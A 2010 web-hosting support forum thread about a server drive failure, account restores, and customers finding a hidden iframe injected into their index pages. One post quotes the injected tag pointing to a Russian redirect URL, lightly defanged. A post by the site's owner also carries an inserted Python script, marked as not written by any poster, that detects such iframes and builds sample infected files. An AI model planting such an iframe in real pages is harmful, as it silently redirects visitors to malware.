Server Down


47 replies to this topic

#1 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • 664 posts

Posted 13 June 2010 - 11:31 AM

The server is currently down and we are investigating the issue.

We found a few file system errors on the primary check and we are working hard to fix the issues.

Please watch this thread for further updates.

We are sorry for the inconvenience and short notice.

Alex Spaford
Technical Support
TotalChoice Hosting, Inc.
Total Choice Hosting - Helpdesk


#2 rajakiit

rajakiit
  • Members
  • 2 posts

Posted 13 June 2010 - 12:19 PM

Any idea how soon it will be back up?

#3 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • 664 posts

Posted 13 June 2010 - 12:34 PM

On file system checks, a few errors were found on the primary drive that may lead to a crash.

Now we are working hard on the next steps to resolve the issue.

Please watch this thread for updates.



#4 TCH-Thomas

TCH-Thomas

    Volunteer Moderator

  • Members
  • 14,908 posts

Posted 13 June 2010 - 01:39 PM

Welcome to the forum, rajakiit. :)

I don't think the techs know at this moment how long it will take to solve this but I can assure you that they are working as fast as they can.

Thomas Jikrantz
Forum Moderator
TotalChoice Hosting, Inc.

Any links or suggestions for third party software/sites should be used at your own risk. My opinions and recommendations are not necessarily those of TCH and TCH is not responsible.

As a Forum Moderator I can assist in answering many of your hosting related questions. However, I am unable to answer questions about specifics relating to your account such as billing and server related issues. Should you need assistance in these areas, please contact our Help Desk or our many other options. Another good place to find answers is with our help pages, tutorials and movie tutorials.
Web Hosting by Total Choice Web Hosting - 24/7 Help Desk


#5 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • 664 posts

Posted 13 June 2010 - 01:54 PM

The sad news is that the primary drive has failed. We placed the new disk and the operating system has been installed.

cPanel is being installed and we shall restore the accounts soon.



#6 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 04:46 PM

The sad news is that the primary drive has failed. We placed the new disk and the operating system has been installed.

cPanel is being installed and we shall restore the accounts soon.


Just writing to subscribe to this thread

Edited by smartdog, 13 June 2010 - 04:48 PM.


#7 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • 7 posts

Posted 13 June 2010 - 04:54 PM

I had an issue yesterday where I had to remove an iframe AFTER the closing html tag in every index.php file (wordpress blog)
No idea on how it got there and only found out about it because I couldn't load the page in Google Chrome.
It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...p?topic=32855.0

Could this have anything to do with the issue?

#8 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 05:02 PM

Account restore started, currently at 1%.
Carl Noonan
Technical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog


#9 TCH-Bruce

TCH-Bruce

    Volunteer Moderator

  • Members
  • 19,960 posts

Posted 13 June 2010 - 05:11 PM

I had an issue yesterday where I had to remove an iframe AFTER the closing html tag in every index.php file (wordpress blog)
No idea on how it got there and only found out about it because I couldn't load the page in Google Chrome.
It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...p?topic=32855.0

Could this have anything to do with the issue?

No this would have nothing to do with the hard drive failing.

But I would ask what version of WP you are using since this was inserted code. Make sure your WP is current and make sure your passwords are secure.

Bruce Richards
Forum Moderator
TotalChoice Hosting, Inc.
Webhosting by Total Choice Web Hosting - General Support Forum

I am a Forum Moderator. While I can assist in answering most of your hosting related questions, I am unable to answer questions about specifics relating to your account such as billing and server related issues. Should you need assistance in these areas, please contact our Help Desk or our many other options. Another good place to find answers is with our help pages, tutorials and movie tutorials.


#10 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • 7 posts

Posted 13 June 2010 - 05:25 PM

No this would have nothing to do with the hard drive failing.

But I would ask what version of WP you are using since this was inserted code. Make sure your WP is current and make sure your passwords are secure.


It was 2.92 (or the latest version behind the beta 3) I'll upgrade to 3 when it's out of beta.
All plugins were current as well as the theme.
I was going to change passwords and that's when I found out the site was down.

#11 spadin

spadin

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 05:39 PM

It was 2.92 (or the latest version behind the beta 3) I'll upgrade to 3 when it's out of beta.
All plugins were current as well as the theme.
I was going to change passwords and that's when I found out the site was down.


I know this is off-topic, but I noticed the same iframe on a Wordpress install on the Jango server yesterday too. I have another Wordpress install on a different TCH server that didn't get this iframe injection.

Thanks for the hard work guys! I hope you're able to resolve the hard drive failure.
Sandro

Edited by spadin, 13 June 2010 - 05:39 PM.


#12 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • 7 posts

Posted 13 June 2010 - 05:41 PM

I know this is off-topic, but I noticed the same iframe on a Wordpress install on the Jango server yesterday too. I have another Wordpress install on a different TCH server that didn't get this iframe injection.

Thanks for the hard work guys! I hope you're able to resolve the hard drive failure.
Sandro


Maybe it's not off topic at all...

#13 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 06:08 PM

20% complete

#14 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 06:54 PM

35%

#15 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 07:30 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence???
says: <iframe src=hxxp://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

replaced http with hxxp for security reasons

#16 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • 7 posts

Posted 13 June 2010 - 07:47 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence???
says: <iframe src=hxxp://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

replaced http with hxxp for security reasons



curiouser and curiouser...

#17 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 07:51 PM

50%

#18 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 07:57 PM

Can we address the iframe injection issue on this server? I am concerned and am checking all of my index php pages tonight!

#19 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 08:14 PM

I also want to add to this...

I found 3 other index.php files that the same iframe exploit was inserted, and they were all in my admin section!
Not good! I've fixed the problem, but am still concerned that this is a server wide issue since it isn't just my site.

#20 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 08:35 PM

At 65%

#21 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 08:42 PM

Please note that we are restoring the accounts with the backups that are available on the server. If the backed up data is compromised, then the account will naturally be restored with it. The iframe exploit has nothing to do with a disk getting corrupt. A typical iframe exploit originates from the client account getting infected with a trojan which then sends the FTP passwords to attackers. They use the logins to modify the contents of the site.

http://en.wikipedia.org/wiki/Gumblar and searching in google will give you more details about it.

What you need to do at the earliest is to check your local system as well as others who are having the logins with updated spyware / malware / antivirus scanner to ensure that your system is clean. Please note that many users have mentioned Malwarebytes, the free version of Comodo etc picking this up and blocking any "further" installs onto the local system. So I would suggest trying out that as well. Once done, update your machine and install all patches. You can then reset the logins of all your accounts (cpanel, email accounts etc) to a very secure one.

DO NOT save this password on your browser or system as plain text. You can use password managers like AnyPass or any other that you feel comfortable to encrypt them upon storing. Try not to store them inside programs that you use to upload files to a server.

I would suggest using the secure link for all cpanel accesses --
https://PUT_DOMAIN_HERE/cpanel
https://PUT_SERVERNAME_HERE/cpanel
and using sftp in case you are uploading.

#22 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 08:52 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence??


Please check your zen cart version as I believe it needs an update. The latest version is 1.3.9d and yours seems to indicate 1.3.7

#23 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 08:58 PM

Carl: It is a fully patched updated version as far as security is concerned tho...
I am in the midst of downloading a recent version, but my main page outside of zencart seems to have been affected too :(

#24 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 13 June 2010 - 09:02 PM

I am on jango and have the same security issues where every time the index.php and index.html files are being modified with an iframe. AND all my software is up to date and it is still happening. I had mentioned that I suspect this is a server issue but TCH says it isn't. I now am even more convinced that the Jango server is compromised since a lot of others who are hosted in this server have similar problems. What is going to happen now?

Thanks
Ron

#25 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 09:09 PM

Digging deeper..ALL of my index.php and index.htm and index.html have same code. :( NOT just the zencart

#26 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 13 June 2010 - 09:12 PM

@smartdog, that is what happened to me as well AND all my files had permission changed to 777, you'd better check that too!

#27 rajakiit

rajakiit
  • Members
  • 2 posts

Posted 13 June 2010 - 09:17 PM

A quick curiosity question back on the original thread... when Fantastico De Luxe is restored on the server, is the Drupal update in the queue to be placed in Fantastico? If so, I will wait 'til then to install it... it is SO much easier to upgrade that way than doing it manually.....

#28 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 13 June 2010 - 09:28 PM

It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...hp?topic=32855.


Same here, this is how it started with me as well, about eight to nine days ago to be precise! :(

#29 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 09:41 PM

Let me be very clear about this server restore.

We understand your concerns and assure you that the problem with this server is a disk going bad and not a compromise. We have always been open in sharing information. TCH has had a few server compromises in the past and it was always disclosed to the clients. We have a variety of server security software in place and there is no way the server is going to remain hacked for days. As usual all server logs were checked.

Please note that our primary aim is to get the accounts back online at the earliest. The box will be in its full configuration once the restore is complete. We will work on any account level issues once the restore is reported as complete.

#30 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • 1,180 posts

Posted 13 June 2010 - 09:42 PM

Account restore is at 75%

#31 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 13 June 2010 - 10:28 PM

TCH Gang,

I wanted to give you an update on the status of Jango.

We are nearly 90% thru the account restore.

There are no signs of a server compromise. In fact I was at the Data Center personally and went thru this server with my techs and we were not able to locate any thing that would have pointed to the server being compromised.

It was decided to restore the server when we noted several errors from the main hard drive. This coupled with the possible security issues, it was really a good choice to go forward with the restore. We really had no choice, every time we started to get thru a FSCK on the server more files would start going corrupt.

We have seen servers compromised in the past and we have always been very open and honest about this type of event. In this case, we did not see any signs of a compromise. There were just severe issues with the file system/hard drives.

My team is always working hard to bring you the best service possible. I am sorry for this unscheduled downtime, but we are working to provide you the best possible service.

Thank you

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#32 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 13 June 2010 - 10:34 PM

Thanks Bill for the update.

I am still puzzling with one question... :(

How do you explain that at least three and perhaps even more accounts on this same server have similar security issues? Would you like to comment on that please?

Thanks
Ron

#33 gcjames

gcjames
  • Members
  • 1 posts

Posted 13 June 2010 - 10:51 PM

I had the same thing, in addition to about 100-150 hidden links added to my page. I also noticed that emails sent just before the server went down did not come back. Will those be restored? I really needed a couple of them.

#34 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 13 June 2010 - 11:02 PM

Once we get the restore done, we can start looking at the logs in more detail.



#35 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 13 June 2010 - 11:03 PM

Ron,

It could be that three or four accounts on the server all had the same security issue within the files in their /home account.

I will admit that having so many accounts with the same security issues is odd, and we are looking into this now.

The main thing I want to do is get this server back online fully and secure, then attack the questions.



#36 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 13 June 2010 - 11:08 PM

Bill, thanks very much!

Let's hope these security issues will soon be history!

Thanks
Ron :(

#37 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 13 June 2010 - 11:13 PM

Security issues be gone!!!

The restore is completed, we have a couple failed accounts that did not restore.

The team is working on it now.



#38 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 11:44 PM

Bill: When you said "Security Issues Be Gone"
Can you please explain? I've spent all night removing said code from all of my index pages and want to be assured this is not going to happen again, and basically would like to know why it happened if you would be so kind.

Edited by smartdog, 13 June 2010 - 11:46 PM.


#39 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 13 June 2010 - 11:49 PM

I was referring to the security issues on a few accounts on this server.

We are still reviewing the old server logs and have been unable to find any signs of a server compromise. Does this mean the server was not compromised? No it really does not. However, we can not find anything that points to a total server compromise.

What I can tell you is that we have a new server online and have restored all our backups to this server. So if there were any server level compromises those are gone.

At this point we will continue to work towards getting everyone's data back online via account restores and work on going thru the old server to find any thing we missed the first time thru.



#40 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 13 June 2010 - 11:55 PM

ok, understood.
In the meantime..can you please inform those of us that were affected by this particular exploit what else to look for in our site pages/logs/etc to make sure we are not still compromised? Any help you can provide would be greatly appreciated. And I would love it if you could make it more in layman's terms as I am not 100 percent up on technical lingo. Thanks.

#41 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 14 June 2010 - 12:03 AM

smartdog,

In order to keep your account secure, here are some of steps that you can take:

# Maintain strong passwords for all logins (cpanel, email accounts, database users, ftp etc). You can use a combination of alphabets, numbers and special characters for this. Ensure that it is a long one and is rotated frequently.

# Maintain different passwords for cpanel, email accounts, database users etc. ie, different passwords for each login requirement.

# Ensure that no files / directories have loose permissions set on them. This is very important.

# Update all your scripts to the latest release by the vendor as and when they provide it. You can sign up for their newsletters so that you get alerts whenever a revised version is available.

# Do not leave any scripts unattended if you are not really using it, always better to remove them from your account.

I would suggest using the secure link for all cpanel accesses --

https://PUT_DOMAIN_HERE/cpanel
https://PUT_SERVERNAME_HERE/cpanel and using sftp in case you are uploading.

Make sure the computers you're using to connect to the TCH are secure and free of virus and malware. Make sure you're running up to date anti-virus and malware software.

There's an exploit called "Gumblar" that spreads itself to webmaster's web sites from their personal computers. The virus uses your FTP credentials to upload infections to your sites without your interaction, injecting obfuscated javascript into html, js and other files on the server. It spreads itself when browsers visit the pages.

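One way to automate the checks discussed in this thread (invisible iframes in web files, markup appended after the closing html tag, and world-writable permissions), as an added example that is not from any poster or from TCH. The function names, finding codes, sample site layout and the injected URL are all constructed for illustration.

```python
import os
import re
import stat
import tempfile

WEB_EXTENSIONS = (".php", ".html", ".htm", ".js")
IFRAME_TAG = re.compile(rb"<iframe\b[^>]*>", re.I)
ZERO_SIZE = re.compile(
    rb"""\b(?:width|height)\s*=\s*["']?0(?:px)?["']?(?=[\s>/])""", re.I)
HIDDEN_STYLE = re.compile(rb"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
CLOSING_HTML = re.compile(rb"</html\s*>", re.I)


def hidden_iframes(data):
    """Return every <iframe> tag in data that is zero-sized or styled invisible."""
    return [m.group(0).decode("latin-1") for m in IFRAME_TAG.finditer(data)
            if ZERO_SIZE.search(m.group(0)) or HIDDEN_STYLE.search(m.group(0))]


def trailing_markup(data):
    """Return the non-whitespace bytes that follow the last </html> tag."""
    matches = list(CLOSING_HTML.finditer(data))
    return data[matches[-1].end():].strip() if matches else b""


def scan_file(path):
    """Return the sorted finding codes for one file or directory."""
    info = os.lstat(path)
    if stat.S_ISLNK(info.st_mode):
        return []  # never follow symlinks out of the web root
    findings = set()
    if info.st_mode & stat.S_IWOTH:
        findings.add("world-writable")  # e.g. mode 777
    if stat.S_ISREG(info.st_mode) and path.lower().endswith(WEB_EXTENSIONS):
        with open(path, "rb") as handle:
            data = handle.read()
        if hidden_iframes(data):
            findings.add("hidden-iframe")
        if trailing_markup(data):
            # Some templates legitimately emit text here: review by hand.
            findings.add("content-after-html")
    return sorted(findings)


def scan_tree(root):
    """Map each relative path under root to its findings; clean paths are omitted."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            codes = scan_file(full)
            if codes:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = codes
    return report


def build_sample_tree(root):
    """Write a small constructed site; the injected URL is a placeholder."""
    injected = (b'<iframe src=http://injected.example/go.php width=0 height=0 '
                b'style="display:none"></iframe>')
    page = b"<html><body><h1>Home</h1>%s</body></html>\n"
    visible = b'<iframe src="/player" width="560" height="315"></iframe>'
    samples = {
        "clean/index.html": (page % b"", 0o644),
        "video/index.html": (page % visible, 0o644),              # normal embed
        "blog/index.php": (page % b"" + injected + b"\n", 0o644),  # after </html>
        "shop/index.html": (injected + page % b"", 0o777),         # top of page
    }
    for rel, (body, mode) in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        os.chmod(os.path.dirname(full), 0o755)
        with open(full, "wb") as handle:
            handle.write(body)
        os.chmod(full, mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as web_root:
        build_sample_tree(web_root)
        for rel, codes in sorted(scan_tree(web_root).items()):
            print(rel, ", ".join(codes))
```

Pointing `scan_tree` at a local copy of an account's web root lists only the files that need attention; comparing the flagged files against a known-good backup shows exactly what was inserted.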


#42 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 14 June 2010 - 12:05 AM

There is an article on cnet about gumblar.

http://news.cnet.com...244529-83.html



#43 scotlandview

scotlandview

    Family Friend

  • Members
  • 27 posts

Posted 14 June 2010 - 12:17 AM

Hi Bill,

It's a comfort to know that we are running on a new server, at least that rules out any server side issues (I hope). Has the name of this new server changed or are we still running on jango?

Thanks for all the hard work and informative thread!

Ron :(

#44 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 14 June 2010 - 12:22 AM

Ron,

Thanks for your continued support and of course your business.

We will be keeping the server name.



#45 smartdog

smartdog

    Family Friend

  • Members
  • 30 posts

Posted 14 June 2010 - 12:22 AM

Everything you've mentioned I have in place..other than the zencart not being the latest version *but.it is patched with all security updates.

And, I am running full time Malwarebytes, and use ESET for my firewall and av..so, I am pretty sure it was not myself that caused this. I kinda feel that because it was not just my site affected that it "possibly" could have been an issue with the "backup" that was used? I am not totally convinced my personal settings were the issue here. But...as you said, you are still looking at the logs. I've also looked thru mine and cannot see anything for June that looks like an exploit. This is why I find it very strange.



#46 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 14 June 2010 - 12:28 AM

Smartdog,

That is actually good that you are very up on your security. We will keep reviewing the old server, but most importantly we are moving forward with the new server.

Thank you for your support.



#47 wildenborch

wildenborch
  • Members
  • 3 posts

Posted 14 June 2010 - 03:00 AM

Hi All,

I have an updated smf/tinyportal site and also my index.php files were hacked.
All index files were dated 10-10-2006 and it happened to 644 & 755 attributed files.

Fred
The Netherlands

Edited by wildenborch, 14 June 2010 - 03:07 AM.


#48 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • 6,798 posts

Posted 14 June 2010 - 08:20 AM

The restore of the server has been completed. If you're still having any issues, please feel free to open a support ticket and let us know.

Thank you for your support. If we track down any issues that we did not uncover earlier, I will let you know.





